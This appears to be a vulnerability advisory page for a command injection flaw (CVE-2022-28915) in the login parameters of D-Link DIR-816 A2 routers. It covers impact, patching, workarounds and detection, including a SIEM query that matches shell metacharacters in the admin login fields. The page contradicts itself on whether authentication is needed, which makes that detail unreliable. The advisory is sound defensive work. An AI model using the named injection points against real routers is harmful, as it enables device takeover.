Login Sign Up

CVE-2022-28915

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

This CVE describes a command injection vulnerability in D-Link DIR-816 routers that allows attackers to execute arbitrary commands on the device. Attackers can exploit this by injecting malicious commands into the admuser and admpass parameters during administrative authentication. This affects users of D-Link DIR-816 A2 routers with vulnerable firmware versions.

💻 Affected Systems

Products:
  • D-Link DIR-816 A2
Versions: v1.10CNB04 and potentially earlier versions
Operating Systems: Embedded Linux firmware
Default Config Vulnerable: ⚠️ Yes
Notes: The web administration interface must be accessible for exploitation. Default configurations typically expose this interface.

📦 What is this software?

Dir 816 Firmware by Dlink

View all CVEs affecting Dir 816 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise allowing attackers to install persistent backdoors, intercept network traffic, pivot to internal networks, or brick the device.

🟠

Likely Case

Attackers gain administrative control of the router, enabling them to modify DNS settings, redirect traffic, or steal credentials from connected devices.

🟢

If Mitigated

Limited impact if device is behind firewall with restricted administrative access and network segmentation.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires access to the administrative interface but does not require valid credentials. Proof-of-concept code is publicly available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check vendor for latest firmware

Vendor Advisory: https://www.dlink.com/en/security-bulletin/

Restart Required: Yes

Instructions:

1. Visit D-Link support site. 2. Download latest firmware for DIR-816 A2. 3. Log into router admin interface. 4. Navigate to System Tools > Firmware Upgrade. 5. Upload and apply new firmware. 6. Reboot router.

🔧 Temporary Workarounds

Disable Remote Administration

all

Prevent external access to administrative interface

Log into router admin > Advanced > Remote Management > Disable

Restrict Administrative Access

all

Limit administrative interface access to specific IP addresses

Log into router admin > Advanced > Firewall > Access Control

🧯 If You Can't Patch

  • Isolate router on separate VLAN with strict firewall rules
  • Implement network monitoring for unusual administrative access patterns

🔍 How to Verify

Check if Vulnerable:

Check firmware version in router admin interface under Status > Device Info

Check Version:

curl -s http://router-ip/status.asp | grep Firmware

Verify Fix Applied:

Verify firmware version is updated beyond v1.10CNB04

📡 Detection & Monitoring

Log Indicators:

  • Unusual POST requests to /goform/setSysAdm with shell metacharacters
  • Multiple failed login attempts followed by successful login

Network Indicators:

  • Unusual outbound connections from router
  • DNS changes not initiated by administrator

SIEM Query:

source="router.log" AND (uri="/goform/setSysAdm" AND (user="*;*" OR pass="*|*" OR user="*`*"))

📊 Metadata

CVE ID: CVE-2022-28915
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-78
Published: May 10, 2022
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-28915, you might also want to check these:

CVE-2023-2564 10.0

This CVE describes an OS command injection vulnerability in scanservjs web scanning software that al...

Same vulnerability type (CWE-78)
CVE-2024-58338 10.0

Anevia Flamingo XL 3.2.9 contains a restricted shell escape vulnerability that allows remote attacke...

Same vulnerability type (CWE-78)
CVE-2025-26389 10.0

This critical vulnerability allows unauthenticated remote attackers to execute arbitrary code with r...

Same vulnerability type (CWE-78)